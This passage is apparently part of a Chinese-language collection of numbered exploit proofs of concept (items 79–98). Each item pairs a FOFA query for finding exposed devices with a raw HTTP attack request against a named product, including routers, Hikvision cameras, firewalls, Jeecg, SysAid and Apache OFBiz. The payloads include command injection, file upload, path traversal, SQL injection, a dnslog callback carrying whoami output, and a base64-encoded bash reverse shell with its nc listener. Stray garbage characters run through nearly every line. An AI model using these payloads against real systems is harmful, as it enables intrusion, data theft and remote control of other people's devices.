q2 u m( {; f) [/ { M4 Z+ x1 b+ F6 O; c* A( J# p
/Applications/SkillDevelopAndEHS/
. G5 [* X- {7 Q" p, {------YsOxWxSvj1KyZow1PTsh98fdu6l--
+ w. C3 v. X2 D
4 `0 B* N2 Q- z: a# o9 ]! e& ]2 R2 z' e8 B# W' _1 I! M7 [
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
$ u& I. l: S) T2 y2 k, _4 ^# iHost: x.x.x.x
* a: k5 M+ ?& C: C1 v2 P
1 M1 t, q) N( c) J& {0 B4 u4 j: |) P4 M$ c& j$ C" v7 b8 O2 K2 M
79. BYTEVALUE 百为流控路由器远程命令执行. k. N' j. H) O, H
FOFA:BYTEVALUE 智能流控路由器# c& ^- r. r7 W) w" c5 j( Z" r
GET /goform/webRead/open/?path=|id HTTP/1.1
- s- |2 ]0 D% }/ DHost:IP K7 e% w6 r' p; v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
8 \# B d* X* z/ [2 O& pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 t; {- \4 ^& L& X b" p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# L' O" `( h2 Q4 w' \0 G$ I
Accept-Encoding: gzip, deflate
0 g0 v- d/ l2 ~( }4 l1 ^Connection: close
& D5 m z( }$ T0 rUpgrade-Insecure-Requests: 1
6 n+ [6 _/ V. C4 r: c. u+ d3 d. V+ e' g5 s( k- j
( W. H& I* G/ F' I( ?# Z; K$ Q80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
4 ]) p1 B3 s8 {( x) wFOFA:app="速达软件-公司产品"
; `- g" A, y5 j9 g D0 m) zPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
, H1 W4 u @& Z, u) {Host: x.x.x.x
9 d+ K! ?6 m7 h4 ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 V+ S2 N& ]9 yContent-Length: 27
. y( w! s6 B# G4 h4 s' GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# k; l; B& [" m: y/ w: N
Accept-Encoding: gzip, deflate& g' N0 B6 O. D. p1 }( G2 t; ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. \& v& q* X1 r
Connection: close
5 g* Q( j( l4 o% h3 H. K2 D" xContent-Type: application/octet-stream
+ O5 [: r, x: `5 R) ?% j g, QUpgrade-Insecure-Requests: 11 S% ?" V$ [; b& h/ O' b v# H+ o
2 j7 G9 `* ^: B% F% f8 |8 U2 w
<% out.print("oessqeonylzaf");%>: p( G! ]& [4 q. D8 V! d0 Q" G
5 a6 H7 H9 b' F. J ^$ n& p& D0 W, a
GET /xykqmfxpoas.jsp HTTP/1.1$ v/ Y$ f x' e+ d+ F% K
Host: x.x.x.x
0 \* t, I" _: Z9 K$ K5 t! _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% y# q7 E+ {" |) y9 mConnection: close
$ n+ `# S6 i8 v$ |. o& S- wAccept-Encoding: gzip' A! j% T; ~' Y' j s
( g7 w) R. { O* K$ O
$ P+ h8 W% X- I& N7 h8 ~81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
2 R6 k# Y8 _' j& uFOFA:app="uniview-视频监控"
+ x. ?4 v1 D( k% ]6 L5 j- Q. a YGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
6 y' N4 X% q" |9 }' u+ q' mHost: x.x.x.x+ u. {- `$ m- q" _' B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. O+ j, }$ X5 p7 m1 [9 I1 c' z1 j' f
Connection: close4 s* y( ?) q: x; r8 ]0 P9 V$ O( X
Accept-Encoding: gzip. o( t# L6 I* m0 y5 o2 E' X7 j
; X m2 i5 k |& ^
+ P% ^/ G6 O# D: s+ g
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
4 r! A; e7 Q' r' ?& e/ {FOFA:app="思福迪-LOGBASE"0 w: C4 |2 M$ v
POST /bhost/test_qrcode_b HTTP/1.1; K2 A, {* e" g# L, l
Host: BaseURL8 P8 s" j o; Y; G. C. f5 t
User-Agent: Go-http-client/1.1
: l9 p% H& C- |% K+ \Content-Length: 23! }) v- a, A9 h ~* _; {7 k, V
Accept-Encoding: gzip
+ w( T8 L8 Z" xConnection: close& [6 U+ B" i- o7 `/ {/ C0 C
Content-Type: application/x-www-form-urlencoded+ k4 o+ O, n+ h A
Referer: BaseURL0 P$ k5 z$ p* ]' Y4 E- z0 S/ g
4 H# M7 i: X; d: Y3 U# ?z1=1&z2="|id;"&z3=bhost2 c& A* T) V' z& @0 Y
2 Z0 [: e6 r" W( @2 c& ?3 g4 t/ ?" X3 {1 Z! e) h
83. JeecgBoot testConnection 远程命令执行
4 r0 }/ B7 a* H* C; }' @5 n fFOFA:title=="JeecgBoot 企业级低代码平台"
$ [/ P$ O1 J. k5 J x( c- z& m/ I+ O
/ P" }) i7 j2 S" \0 w
f7 c1 t& w- [4 V; T8 X. oPOST /jmreport/testConnection HTTP/1.1
9 h* C# z# d/ n/ k- [Host: x.x.x.x
" M0 d- X) W- Y+ a. P6 _. Q9 J. xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# g1 R* \& f& e. w# o/ P7 TConnection: close
& _, S7 q1 q1 u) \Content-Length: 8881
! T2 r: A/ t4 _! e9 oAccept-Encoding: gzip" ^. ~$ U) e h+ K. ?* G
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
w' n- H7 \" d# c+ {Content-Type: application/json2 o- v5 Z8 G6 C3 c2 ~: v
. d/ V' ^' l* P& Z- i4 O6 C! YPAYLOAD
& U" f% x' R; V8 U) `
- g4 w& }. N4 v/ o84. Jeecg-Boot JimuReport queryFieldBySql 模板注入! [( [- l. i' {' {, X: Z; @9 v' a7 i
FOFA:title=="JeecgBoot 企业级低代码平台"# o1 e$ T" \& o2 ?* R6 U
6 I" u; D' g2 G
: A& K* g, O" X+ n4 M9 e! g2 W' {+ ?
1 Q' `' ^* G+ K
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
1 N3 r( \% B4 [' WHost: 192.168.40.130:8080
' B: w3 q/ ?+ f/ qUser-Agent: curl/7.88.1
* P& G" W; P8 \: x! k/ u$ j: UContent-Length: 1561 T$ }2 q9 q7 L6 R/ B* s5 ~ T" G
Accept: */*
6 Z1 G z& c0 j; {3 MConnection: close
0 m4 w. H$ I5 X; N# Y% g: O* cContent-Type: application/json3 q# `3 d X5 W! L ]8 V
Accept-Encoding: gzip8 C4 z4 r. O3 e4 b) u# K
8 ?- Z3 v0 v# g g
{
. d. L( e8 a M6 a$ g/ Z! I/ ]7 g "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",$ R- J& ?3 N( t1 @
"type": "0"2 w" a8 X: d" S& d6 r' B+ l- j
}7 t4 n3 n; Q1 e: A: t& X
2 J+ t: ~* v9 R4 h C; v) R: J
( x4 l7 v. v, H' z85. SysAid On-premise< 23.3.36远程代码执行
2 W" f- c7 @6 F. y+ v: S: V/ FCVE-2023-472466 ~; u$ t( l; |# q5 L6 A# V
FOFA:body="sysaid-logo-dark-green.png" 7 x! i5 D5 n+ F9 o* O# a
EXP数据包如下,注入哥斯拉马
# `& j5 y" [! T) M6 Y N, bPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
1 ? U- S& N7 S% K9 T- p& YHost: x.x.x.x
- B3 R( d+ W7 |, |+ iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! o; u8 E* h2 O; H4 X! ~, tContent-Type: application/octet-stream, R' v% A5 e: s* `
Accept-Encoding: gzip
$ S! v6 e' W' Y3 Z0 @9 W! p7 T# W q6 V/ g
PAYLOAD7 T' E6 Q6 i4 u1 b# v c
7 O/ {: o; n' ?) q0 K2 j$ C
回显URL:http://x.x.x.x/userfiles/index.jsp6 H+ z: o K; I) {, l5 }" P
3 {; Z' m5 O2 X2 q4 p" O
86. 日本tosei自助洗衣机RCE' f# y4 t, A- d
FOFA:body="tosei_login_check.php"
4 w- L/ t. u" G% b3 cPOST /cgi-bin/network_test.php HTTP/1.15 c- `4 ~& X5 ] j% L! q" s
Host: x.x.x.x1 w1 s4 K5 f2 v0 } X9 y* G
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
3 I8 p1 p5 Y9 \Connection: close2 d3 t+ p- x6 i( Q( o
Content-Length: 44+ }1 T% w5 E/ s9 x
Accept: */*
! x) B) h \" B5 V1 }Accept-Encoding: gzip6 k8 c+ P& H5 B {0 ? ?
Accept-Language: en
0 F+ A4 |+ z* \# W o6 ~2 hContent-Type: application/x-www-form-urlencoded! A" ^" I( r/ B" u- t7 ~
0 E2 X4 G9 _3 Q thost=%0acat${IFS}/etc/passwd%0a&command=ping' n6 |! k1 V# b' k- a) j$ Z
; J; ^5 s5 C& c9 i
7 L/ e, u8 q- R! f# l5 z: H; A: a87. 安恒明御安全网关aaa_local_web_preview文件上传
' Y# {5 d1 h" yFOFA:title="明御安全网关"
4 @2 s* p6 X) R1 QPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.18 ^6 m0 p* y" D* y* H$ b
Host: X.X.X.X
6 D: P* ]2 {$ O' y+ PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 r/ u- v; r8 y+ U6 |% }3 A2 X2 w! J
Connection: close
$ H; Q2 S4 b5 F" [# _Content-Length: 198
( ~, ]; M8 l2 n4 t" nAccept-Encoding: gzip
: m3 O1 g* [( X* q8 m/ sContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd: {# Z: @7 A% C- Y" t
% `" u$ C: c* n% T
--qqobiandqgawlxodfiisporjwravxtvd" e( @- s7 C9 M% a; M1 Z1 ~: d
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"2 s0 A2 A7 P7 t4 j$ E0 l
Content-Type: text/plain
# |( h# `4 ^2 S) E$ M
6 x: Y( j& k3 y3 L: v! m2ZqGNnsjzzU2GBBPyd8AIA7QlDq5 _$ r# y6 Q+ A* |7 w
--qqobiandqgawlxodfiisporjwravxtvd--6 {, h0 c7 n9 A
6 A2 O4 |3 L& g
$ h$ s: B! e( `- M/jfhatuwe.php$ ~0 x' Y2 A/ N5 e: M
" ]: d4 {8 D3 Z/ i88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行8 \# V9 l/ ?" _9 Z
FOFA:title="明御安全网关"
7 s1 B. S- h YGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
+ w" S4 o; T) mHost: x.x.x.xx.x.x.x' D& F8 g: @- D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- G1 N( |$ z7 k/ tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 f- M) d- p" e8 b1 r: N cAccept-Encoding: gzip, deflate2 e- t: m! }0 E4 Z- e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" H8 u) l+ R" z
Connection: close
" M: e& S' S+ p4 j+ a2 K
3 b/ h+ P" C/ L) H y
7 C; a& c5 s: R: k( q& F: V/ {/astdfkhl.php4 `3 o) ?; Z- |) i, C$ L
+ h; C p9 m M5 m8 Q6 u, J' u89. 致远互联FE协作办公平台editflow_manager存在sql注入( g g- L9 E7 `1 J/ d' n9 I; {
FOFA:title="FE协作办公平台" || body="li_plugins_download"2 z! L; n& T( ]& {) c
POST /sysform/003/editflow_manager.js%70 HTTP/1.19 }2 {! A! x: Z! y4 W
Host: x.x.x.x
4 `, j# |: [6 T" e# dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! b) j, [' ^2 N* q3 m9 r# z9 J
Connection: close. @- t0 w# V; Y& g
Content-Length: 414 B0 C- l% o( L4 u
Content-Type: application/x-www-form-urlencoded
$ s' \+ G: B, [6 gAccept-Encoding: gzip: {/ {: @0 j x# G& w7 M
: {; {. h$ X @; Toption=2&GUID=-1'+union+select+111*222--+$ j- `( C0 R# t# j
& b+ s: k: J7 o2 W' e v
1 m5 _' A, S. C7 s& X90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行2 o* {, J5 k) A6 K+ X
FOFA:icon_hash="-1830859634"
5 r: @7 t: X% K- H" i4 Q5 SPOST /php/ping.php HTTP/1.1
+ `1 V& `) ?5 E9 o5 i" Y2 k' KHost: x.x.x.x
: Y& s/ Y' H, d6 m, a* ?* I8 X( gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
* ? j" f3 T& u8 Q5 J" [Content-Length: 51
; S8 h& Q; U) T! vAccept: application/json, text/javascript, */*; q=0.01
3 X) N# T# n2 U# G/ x) uAccept-Encoding: gzip, deflate3 c7 ~; o- V O, [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 M* z3 X# s7 ^+ k5 p `% x- s7 GConnection: close
[& z( x4 h$ s& g7 M( tContent-Type: application/x-www-form-urlencoded
# N0 b% i8 z' e4 r5 R" zX-Requested-With: XMLHttpRequest" ?* N d& B9 Q. c/ `
% y* g) a0 y+ J
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
% W( x; \9 j4 H. U: u
; k4 _; W# c6 I5 h$ K1 S. g
' s( S% \0 y7 q ^91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取( ^/ f& u( y3 B) S9 b0 \
FOFA:title="综合安防管理平台", w: k3 P; Z9 J
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.13 Q9 \. E. E- s- D4 W8 P q
Host: your-ip
) u" q! m0 t. C3 W, pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36+ `; ^" ~$ Q2 w' r
Accept-Encoding: gzip, deflate
$ n2 j; E3 W) u1 [8 a$ p/ n: b7 fAccept: */*
7 D; H( J2 t, E) wConnection: keep-alive# n1 C7 H6 }' q+ K- b- S
1 e) S w& G9 T" p% f2 s$ Z+ w4 N& ^9 F
5 ^* ?! r9 b9 k) U4 j$ G5 {! F92. 海康威视运行管理中心session命令执行0 T) q! {, l5 B9 V9 R
Fastjson命令执行
+ Z) P; ^; Q1 P6 s! s4 whunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
2 X W9 Y4 z. d( F2 NPOST /center/api/session HTTP/1.14 k7 j9 H8 V/ T9 {- ]
Host:
$ C v) V9 ?' XAccept: application/json, text/plain, */*
7 `" B, Q* s. `% Q4 YAccept-Encoding: gzip, deflate
* t# S+ s+ n9 u+ j+ @X-Requested-With: XMLHttpRequest3 ~1 E$ r% I& r& a7 D: {3 @' `
Content-Type: application/json;charset=UTF-8. l2 I7 V9 e2 O) r5 @
X-Language-Type: zh_CN4 P6 M) F. C9 y+ l4 v5 w, x$ c
Testcmd: echo test
& g9 f1 {5 Q3 z0 A5 e; GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.360 K% p7 B) a# y: r* o" F
Accept-Language: zh-CN,zh;q=0.95 m, a4 i u0 c* e5 b
Content-Length: 5778
0 U6 A9 z" R- Y7 ^0 L: V
% A* ^- s! G) ~6 QPAYLOAD) M! @3 ]9 D# |
$ P% l0 _2 h% M
3 c7 G# w |+ g# q2 _$ K( B- Y93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传) |- a' k% [/ ~# B. i0 f
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg==") D# N" J( P- i
POST /?g=app_av_import_save HTTP/1.1) U9 G* ^# o3 v" Q7 K3 w3 N: u
Host: x.x.x.x7 N8 ?# K. Q6 ]+ E; o
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
- q, F$ z' r# c3 ^! z% XUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36/ h$ j. D6 e1 r; F% K3 \; Q
3 L3 ?4 E, F7 w------WebKitFormBoundarykcbkgdfx$ k3 K" O: U8 }6 h' b/ e0 O: q
Content-Disposition: form-data; name="MAX_FILE_SIZE", A1 ~% h1 E6 Y: j2 `$ o
4 Z9 d9 {6 ]' J9 A
10000000* r0 b; Y& P2 D7 @
------WebKitFormBoundarykcbkgdfx
+ s( } y8 u4 H/ Z" _Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
' [/ s9 E5 o) J8 X: ~" WContent-Type: text/plain' `3 d6 E$ |3 ?, x
% V1 k3 ?+ _5 y$ r/ F+ E
wagletqrkwrddkthtulxsqrphulnknxa
$ `. D) N# u1 g) o- I8 M------WebKitFormBoundarykcbkgdfx
/ O5 M0 S+ r( k1 E8 G8 UContent-Disposition: form-data; name="submit_post"8 x/ Y) d4 Y$ O
+ _6 c4 Q* g2 i! T" E6 @
obj_app_upfile
" |/ n+ r- w1 O3 R, ~------WebKitFormBoundarykcbkgdfx
' d; D6 I# h' S3 C! zContent-Disposition: form-data; name="__hash__"
( c0 `0 e& Y2 A$ p0 ?4 u' v
3 {, D x; n5 Q7 G! F0b9d6b1ab7479ab69d9f71b05e0e9445
3 x$ x+ q. H. X* l. F0 }------WebKitFormBoundarykcbkgdfx--3 w8 V; t+ ^+ \* i8 d
9 G% a7 X- r( g9 a* R* H# h
7 `! \- _% v6 U3 e6 j. u! V
GET /attachements/xlskxknxa.txt HTTP/1.1
, S/ ^" G3 _$ u' FHost: xx.xx.xx.xx
+ ~9 ~+ C' a( a, T* nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- H2 D' w! z% n. \7 f2 @+ b
r( u: |* |) Z _. u, A e4 z- k. f% ?0 m. M# F3 A
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传" R: ~" F1 }- n% [( C
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
) A" `' ~* r+ m& A& e4 d7 APOST /?g=obj_area_import_save HTTP/1.15 L* ^ u( {- R% h, c) T+ ^
Host: x.x.x.x
. ^/ h O! d( h! _9 y) u7 p+ o, PContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt* g, E2 |1 T) E3 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
0 o5 ` P4 W1 K6 p, U- v( c
2 i' c" h6 N* H9 s4 k0 ?------WebKitFormBoundarybqvzqvmt. f5 Q; [- P3 g$ g) ?. Y }( O
Content-Disposition: form-data; name="MAX_FILE_SIZE"
% R) |( D7 \( W3 u: z& x
% r; Z" x" q/ J8 T% ~1 a+ h10000000
6 b, l! a G9 N9 I9 J* Z3 ^------WebKitFormBoundarybqvzqvmt
9 u% d8 L1 O# g: e1 t# FContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
U1 J% c0 R9 y: M0 A. B6 M6 QContent-Type: text/plain
, @7 P4 q0 j. W2 S( w; C# @, h! ?+ }6 |
pxplitttsrjnyoafavcajwkvhxindhmu( [6 \! Z7 s, \
------WebKitFormBoundarybqvzqvmt3 v6 z# J# Y J' e- ]" y8 Y
Content-Disposition: form-data; name="submit_post"* H; e# v% A& l6 k' g6 D
/ r- _! N9 ?* \# d' o* Wobj_app_upfile n$ v$ f( h# z
------WebKitFormBoundarybqvzqvmt! e* @) l ?& V4 `4 |! D+ r
Content-Disposition: form-data; name="__hash__"" k6 ?0 n' `# f- s: @9 ^6 I
X2 Y! p% d) p
0b9d6b1ab7479ab69d9f71b05e0e9445
$ ] Y8 ^$ S3 ^; g' S7 s4 h# y------WebKitFormBoundarybqvzqvmt--
7 N* M' B9 Z- b+ T: z) V! o. ~+ N+ ]" v0 T5 J! D
- |# t# ~6 N; x9 v5 d- ~' H& ?' A
GET /attachements/xlskxknxa.txt HTTP/1.1
; P8 A; L) Y* X& k! S- {" `/ eHost: xx.xx.xx.xx
* N u2 V( L, _ t% b9 vUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.362 l) Z! r% o" t e
( ]# }& q# `% u- j3 I& r8 n3 \
7 N9 p9 y' D# j8 _8 o( @& {* t5 l4 _# r. \: |7 @" D
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行0 F6 w% F1 H7 e$ D6 u" K
CVE-2023-49070' V4 {3 q1 `: d; g6 i- L0 B
FOFA:app="Apache_OFBiz"
/ t& B8 w8 J: D1 @3 r) PPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
+ Z3 p* l4 p! m v& n3 d) M7 AHost: x.x.x.x- c6 |" a) M- ]: y
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
# `) G/ \# D* E6 U9 X, `Connection: close
+ O+ ]- `: s- L1 e* [Content-Length: 889
6 ^) q+ l% `; H, z* k" T" RContent-Type: application/xml8 }2 o/ z) O5 u. o2 f) \
Accept-Encoding: gzip) o9 ]& X/ ^# Z! o2 V/ s+ y; s6 d6 [
& n# k6 `, X2 ^4 U- A+ M<?xml version="1.0"?>/ d8 X* B! X: C3 {" j
<methodCall>* Y0 N7 w; v- ]) G
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
5 s+ \) u0 w/ V' R' K <params>, \" c7 i+ D+ {
<param>
. J9 |9 y+ i8 r* L <value>
9 |. F6 ]5 L6 O. w1 a) N. c+ s <struct>; |3 y; J* _- D( e9 G7 P- {: }* n6 |
<member>4 K6 a% @1 r0 x$ w" l
<name>test</name>
3 u& f6 b. l: N4 d, U- g( |$ A9 ? <value>
" ]+ x9 q2 c: b7 P <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>/ F& O. @' F' n4 i
</value>
# t" S7 i7 H: d6 `7 |: x9 g </member>3 r3 K) K. ]& e) N% {4 K4 c ~
</struct>
. k8 _: I' ?4 H9 D9 Y. B) F </value>
; c3 G0 k L8 _ </param>
: g6 L) d( `! g6 ]" J </params>$ ?/ H* Y, ~1 \( l' |
</methodCall>
" S& y: r; b4 d, G) ]8 J9 R" J' ?+ \6 M: J/ f, S/ F$ s
a+ C* W# T0 S' O# }# L2 f
用ysoserial生成payload
, ]; o# q6 J s \, e% c) N6 l s- cjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"% q& }# R8 {5 Y, u8 A, A5 [
; L9 Q+ S5 }3 d9 [
# T1 Z, J/ l+ ^2 y/ g! ?将生成的payload替换到上面的POC
: z' c. C; w* ]0 ^POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.11 z. F6 @8 V' [5 y) X% P; U
Host: 192.168.40.130:8443- \+ V9 e8 U9 _6 K' |
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
' S: @( x! C' g$ H( s2 x/ V; j$ {% AConnection: close
: _) q6 P3 b7 c8 c6 r. BContent-Length: 889
, e2 }: L3 r8 n& J7 q5 F. |3 qContent-Type: application/xml
1 L# V. L! B$ l& Y* f, NAccept-Encoding: gzip" B) _, X" c3 j5 w
. \% c+ J3 ~8 v/ G5 hPAYLOAD ?, l3 q& l( s, M
8 r* F& D2 r" M& d1 k
96. Apache OFBiz 18.12.11 groovy 远程代码执行
$ U# q0 S0 u0 h' o. ?5 I8 HFOFA:app="Apache_OFBiz"
' `5 U* h1 {6 r6 uPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
r- }/ t/ F; U9 P) H0 G9 _4 SHost: localhost:8443; o0 N. P% Y1 N6 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0: ~+ X3 b# i* W( c7 r. ~
Accept: */*7 Q K9 Q' W/ S8 q6 H* Y T/ u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 L+ V3 x! s" s7 B6 u7 M( t
Content-Type: application/x-www-form-urlencoded; ~4 [/ Z% C' n( @3 L
Content-Length: 55' ]" i, a9 @% r' ~
" k* Q$ H3 C; a6 B* r7 d! ?8 sgroovyProgram=throw+new+Exception('id'.execute().text);
* m" y$ f' Z0 o$ [: j- V* ^! N- ?* n+ s8 T; [
* l2 o0 b' c" e l反弹shell
* c0 V0 y/ R# H8 {4 ^/ d y在kali上启动一个监听; [ B O' P5 F
nc -lvp 7777
, p J) a- `0 R
: \" q* k9 ~+ M! OPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
& `& l4 Z' G g* }* Z, x3 q+ uHost: 192.168.40.130:8443, b* w1 I: h8 w: _& B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
% Y7 Q* A/ v$ l; ~Accept: */*
! v7 C& N8 q) E* ]4 v9 n+ f) S: b! _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; f. |* N- O- yContent-Type: application/x-www-form-urlencoded9 o1 S |/ A, T0 s0 M/ h8 }% Y! b
Content-Length: 71
# O3 [3 j) a4 Z* y9 J+ T3 A. v G) q( s
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();9 j7 E. S) i' `. h L8 b
/ q. I+ Y3 q% ^5 g/ B6 t1 B7 D4 o
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
: g, G) j! N" o( zFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
2 r3 R* U$ l* m9 p& c# _9 x2 WGET /passport/login/ HTTP/1.1
) F H0 N& g( k8 s* b+ k. b% lHost: 192.168.40.130:8085( _$ u, M$ d/ b& k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 l% |6 m% W. D) Z( z% e2 tAccept-Encoding: gzip6 i+ W2 r9 U1 z0 V) L
Connection: close+ E# R7 o7 G0 P
Cookie: rememberMe=PAYLOAD* Z; ~, `2 W5 p$ ^$ [8 C
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"- g4 j. Q8 o, }* h3 e. d
# h( B: }7 L& O, q7 G
( q! A" A& ^2 s98. SpiderFlow爬虫平台远程命令执行$ L2 R4 ^" J' ]- e, E
CVE-2024-0195
/ G4 J/ G$ S, ^& M9 y' [FOFA:app="SpiderFlow"2 e! t/ \7 A1 u' r. a9 q
POST /function/save HTTP/1.1
. y. n" a+ C7 v( e# [4 xHost: 192.168.40.130:8088
" A: p- t6 H. k+ {% @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.02 F9 P! Q. k, q( J; v9 J! s% M
Connection: close- A3 v _: o$ u' s6 q- b. f5 H: J
Content-Length: 1219 f& p, Z, R5 a" |' z' L* R% a( h
Accept: */*- F+ `7 h. A' A8 U$ Y6 D+ j
Accept-Encoding: gzip, deflate- u. \- x! u' R0 ]- z) D1 `9 T
